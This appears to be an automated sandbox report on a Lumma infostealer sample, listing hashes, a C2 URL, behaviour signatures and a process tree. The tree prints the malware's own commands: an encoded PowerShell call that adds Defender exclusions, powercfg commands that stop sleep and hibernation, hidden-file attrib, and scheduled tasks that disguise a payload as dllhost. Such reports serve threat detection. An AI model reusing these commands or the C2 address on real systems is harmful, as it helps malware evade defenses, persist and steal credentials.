Analysis

  • max time kernel
    210s
  • max time network
    211s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    05-07-2024 16:09

General

  • Target

  • Size

    110.8MB

  • MD5

    d0df0647d2681b9d311c11078ccf5812

  • SHA1

    6d2fb23200b7aa0b6ee64a44c40cb22974f6744e

  • SHA256

    f8f22ed85c5e62f8c18d55f794d9c9ff8e864fd9f30c35e2b97bff1917afee1d

  • SHA512

    5d4d20dec45570680214212e2937b504ee0fcc1413dec076a85f94a0709d4e91691b75967f688a5bbc7afe9d2fe90175765c6c5fabae69d14de3f56fed466fb0

  • SSDEEP

    98304:f2OktbpMKV13qLdT/RJywAFh20HEKG4EURcQ4i9:BC1aLdLRJyw220kKdj9

Malware Config

Extracted

Family

lumma

C2

https://bouncedgowp.shop/api

Signatures

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Downloads MZ/PE file
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Power Settings 1 TTPs 1 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 20 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:5104
      • C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
        "C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3656
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:212
          • C:\Windows\system32\mode.com
            mode 65,10
            5⤵
              PID:4808
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e file.zip -p1404753551733818025492326517 -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4796
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_6.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4272
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_5.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:3740
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_4.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:3316
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_3.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:812
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_2.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1928
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_1.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1840
            • C:\Windows\system32\attrib.exe
              attrib +H "Installer.exe"
              5⤵
              • Views/modifies file attributes
              PID:752
            • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
              "Installer.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:868
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                6⤵
                • Power Settings
                • Suspicious use of WriteProcessMemory
                PID:4228
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1192
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4320
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4656
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3468
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1880
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:1472
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4332
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff932369758,0x7ff932369768,0x7ff932369778
      2⤵
      PID:2540
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:2
      2⤵
      PID:2236
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:4448
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2052 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:4936
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:4816
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:4668
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:752
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:2352
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:1812
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:3656
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:2452
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:5108
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4592 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:2644
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:3984
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:60
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:2572
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:4280
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:1004
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5496 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:2456
    • C:\Users\Admin\Downloads\7z2407-x64.exe
      "C:\Users\Admin\Downloads\7z2407-x64.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Modifies registry class
      PID:2832
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2388 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:752
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:4316
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4896 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:4940
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6132 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:3468
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5424 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:4852
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:2340
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:3376
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6452 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:3296
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6596 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
      2⤵
      PID:4012
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
      2⤵
      PID:3004
  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
    1⤵
    PID:2904
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x27c
    1⤵
    PID:3544

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

    Filesize

    211KB

    MD5

    151fb811968eaf8efb840908b89dc9d4

    SHA1

    7ec811009fd9b0e6d92d12d78b002275f2f1bee1

    SHA256

    043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

    SHA512

    83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c

    Filesize

    47KB

    MD5

    127b7a9f7009939d0ae5dd1a48386985

    SHA1

    f9e981f2fbc6df7e304803153fb6fe40f0dcb6ac

    SHA256

    9d8e3219c036313e8b27ecb7b91befc49de6a32352a5349656945a7525a89962

    SHA512

    b1a442d78f6adc7a67f8ee299d46817309798ff2a38a66af2ff03eaa276b3a7967fde34e801dc8488ed75b3110fd01b3a9763f792ce75e21fae190d4779c1287

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

    Filesize

    808KB

    MD5

    c0637a08f2ba40c56260782d2bb3ace4

    SHA1

    a2bf4298414a764ff1342b3f48f45b4dc1669a96

    SHA256

    d6ab12688ec8cfe7f9235b18c7d7a4730d86278ba1efae0d715c0d054465781e

    SHA512

    736d1ac8987102028baef59d43ceb2fde71b3aab2f8f2d8d306846a457e2ac224908968ff7bfe34bb05beb7998223d393244cf5da84f9d64f8b71c9f0b2ca6e2

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

    Filesize

    32KB

    MD5

    af5bf693b92c0d2c8441b3a6640c4ad8

    SHA1

    12ed4ac73239e542ab8d7fa191dddc779808e202

    SHA256

    b9f2c3f2ec75955d96309f759eaf9fb6bf576c238377491dbb92de1768a26012

    SHA512

    c2ef099832fc5e8f1e67acbd550b0590c0fb5c291761280a2e74e6a97763906b9c0c1a2295f285462ba3a0ed7cd5658f296e5f0f9c5d11a97ba210f352f8a438

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

    Filesize

    32KB

    MD5

    cd3756106418d9e83a2baff9904ba221

    SHA1

    4c2ed1c1ebe119027db0fbaf7a64b408f1779b4a

    SHA256

    57ec0895e1bcaf08c769e2d6872f3f3657972f87fac081063445213dae4541ee

    SHA512

    5bf43ccaaf99505f7e8ecf2eda18efe260125accbc12f655601e2acabd822513e153f4b81cbf03a65d13572f11e9f13fd471006a0ce8f2665e8a594ff2d769dd

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

    Filesize

    408B

    MD5

    f9dc26704da07c4fb9b72d27e9f1268e

    SHA1

    5beb50fa7dcf9e01aacfe2515014f66510fb985b

    SHA256

    3881fb4c16119d039cba801214401ef4bc91c761453b59c72c5c1da23bcdde5c

                                                                      SHA512

                                                                      a5e11bc86897bcde36d4a641545504875f71dd7d465d1a6b5461c2ace78558737a2b4d67a8d1c6a2507fcc224cc76b632ad34d98ab5541acf99a8797767ec5eb

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      42722595c5cf2cf703bf0b5b3e213d5a

                                                                      SHA1

                                                                      60b42e133740423754534db5ffd91df6762ac39d

                                                                      SHA256

                                                                      000e35848937e0132ed037079d0adb1a2b444db7f9866e442269f33efc2eaf15

                                                                      SHA512

                                                                      30e25f1d2f7798c46b0c4c7c2c54edc3a22b668cf69d9daf33885e90fbb10409e457c0ab616a87bfc91db95e9100c5e6bfd0899fdf602ca6a2a244931b9092a1

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      371B

                                                                      MD5

                                                                      63864ed43e5004147163ad1f5c1701f6

                                                                      SHA1

                                                                      13d50dea98eca9481f4dacb518e8a8157a9f1c2a

                                                                      SHA256

                                                                      3fd036346ceff5464fa87948ab306d966f2ebae9f70f06d662f374b73c7fa9cc

                                                                      SHA512

                                                                      8db95e08010e03248914d2de7a906767b37711bd4af83c0969a0e5137d2fffb0cdfa97bf6867e769e4eb526cff82e4ae03c72e6ae117cd4711e6e2b88067dda0

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      706B

                                                                      MD5

                                                                      18bba9dd6808199233d001996193daf9

                                                                      SHA1

                                                                      dc5a01485d8334f560daad3555827327dca5e80c

                                                                      SHA256

                                                                      3e9ba9a4e528147effd37ad85a0cc100cfc61c5865d4134ab730ce4ad65c017f

                                                                      SHA512

                                                                      b4cb58c597f210db1467b4bc9b72c321b5f314e068cf9819aab875d0d1855109fe483869197bdc29070378161388a182110a43da6dc489235914e739227ca1b9

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      f59459fcda8df0c834f4ab23336c96e7

                                                                      SHA1

                                                                      e2c5ce89cd38fdab552008015426fdca30f15c07

                                                                      SHA256

                                                                      96c32d5c4b8c6c59713aaac3f3d43ddfcd37ddf548feffbc75b1d1fd21dba1cb

                                                                      SHA512

                                                                      f0498022c2d5a66f66088390ba793df030bbdf614f723b3038e624992fac1c19c36a61177d5893e8da046e6a7fa1315f263789fb534a5190439466f5d763f8c1

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      538B

                                                                      MD5

                                                                      f9963a1618d6458ee89ae77ac559c8e4

                                                                      SHA1

                                                                      a2b95ca3e9e0d9e5d564f4c04e6c193d35fa0101

                                                                      SHA256

                                                                      bd2bd0dbac571dc8000739d8f61d00a1c0682e44babad869a88c67c3cff8f44d

                                                                      SHA512

                                                                      1d7b4dc00d4a91300c6739a9012f3bf081603e3432a94cb0e49c263e05feefa6b227b1f4f7cc223c5d6228abd3c3fccfd743b6700c351b98386e810385a02209

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      371B

                                                                      MD5

                                                                      452b01aa9ffd717677accf05f8ae5528

                                                                      SHA1

                                                                      5db1aa50894c7a16c638ab796031bd17d2dbe7fe

                                                                      SHA256

                                                                      2195dd236c5b9ed6ca06fa47ae0cb39a403a30663c8ad1735e60b4cbab8fbb62

                                                                      SHA512

                                                                      177d66e0e2e88ca26d0ba91fdb7e45adc498b6177d1d8ea6e9d4f7062b963a1b9de6ec0ba3026eace8f3f423249aa3b3b114c873b16bb343f8af9e8ef5f51bd8

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      2269e6fb00d925f9b840301637d32b71

                                                                      SHA1

                                                                      02a04bd01cdd665982dc266aad21016fb647e27f

                                                                      SHA256

                                                                      360baaaa33627edf06eb04cc009fa056125214993426aeeb5dc51328e023c54b

                                                                      SHA512

                                                                      ea0b786f55f3733fef98ae2d71280001b1eb4827c0884e37ea6ac3a6def3d083df2568e0dbaa3e3b51f4da30eef8b1a8bfd9ba70ec5a8bec2f2ab1502024194d

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      b6076ddd0896c4ef07d9d907ec0ccffe

                                                                      SHA1

                                                                      83ef97d88f6ca25b1781587040ca676da4187228

                                                                      SHA256

                                                                      3137611b3a24ea83c7eff1df6226b4594b2da048759bbf7cf8f69505f9c4e773

                                                                      SHA512

                                                                      1140f45c628e1ac5f114f443fae946a08d86013fd5f05f2a1f2718df9346efb3b2eb02989119b49a92c4f69b7147aeae9c48827e23902c14965b6bad4c5d9e32

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      7109a0b4eb6d946ff017179aa1387fbc

                                                                      SHA1

                                                                      ad6d5de96c35028c4350b7d1b39e28b0b9a1c0f1

                                                                      SHA256

                                                                      a4c4ed07cf8c104977ff5d6d45d57e746fc067528a8e2b51e6affd9393f16939

                                                                      SHA512

                                                                      17d211bc4aab2bc82429955e6e77caf7ac4e48420b7fd70eda9f19713d24d4f42f92957b052586bea75519a77b81c72604dd8a5fa0b29dca15aafee1f6f0fd6d

